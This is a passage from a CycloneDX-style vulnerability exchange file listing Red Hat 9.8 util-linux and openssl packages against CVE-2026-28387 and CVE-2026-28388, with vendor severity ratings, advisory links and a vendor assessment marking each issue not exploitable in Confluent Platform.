            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28387",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Issue summary: An uncommon configuration of clients performing DANE TLSA-based\nserver authentication, when paired with uncommon server DANE TLSA records, may\nresult in a use-after-free and/or double-free on the client side.\n\nImpact summary: A use after free can have a range of potential consequences\nsuch as the corruption of valid data, crashes or execution of arbitrary code.\n\nHowever, the issue only affects clients that make use of TLSA records with both\nthe PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate\nusage.\n\nBy far the most common deployment of DANE is in SMTP MTAs for which RFC7672\nrecommends that clients treat as 'unusable' any TLSA records that have the PKIX\ncertificate usages.  These SMTP (or other similar) clients are not vulnerable\nto this issue.  Conversely, any clients that support only the PKIX usages, and\nignore the DANE-TA(2) usage are also not vulnerable.\n\nThe client would also need to be communicating with a server that publishes a\nTLSA RRset with both types of TLSA records.\n\nNo FIPS modules are affected by this issue, the problem code is outside the\nFIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28387"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28387"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28387"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28387"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28388",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a delta CRL that contains a Delta CRL Indicator extension\nis processed a NULL pointer dereference might happen if the required CRL\nNumber extension is missing.\n\nImpact summary: A NULL pointer dereference can trigger a crash which\nleads to a Denial of Service for an application.\n\nWhen CRL processing and delta CRL processing is enabled during X.509\ncertificate verification, the delta CRL processing does not check\nwhether the CRL Number extension is NULL before dereferencing it.\nWhen a malformed delta CRL file is being processed, this parameter\ncan be NULL, causing a NULL pointer dereference.\n\nExploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in\nthe verification context, the certificate being verified to contain a\nfreshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and\nan attacker to provide a malformed CRL to an application that processes it.\n\nThe vulnerability is limited to Denial of Service and cannot be escalated to\nachieve code execution or memory disclosure. For that reason the issue was\nassessed as Low severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28388"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28388"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28388"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28388"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
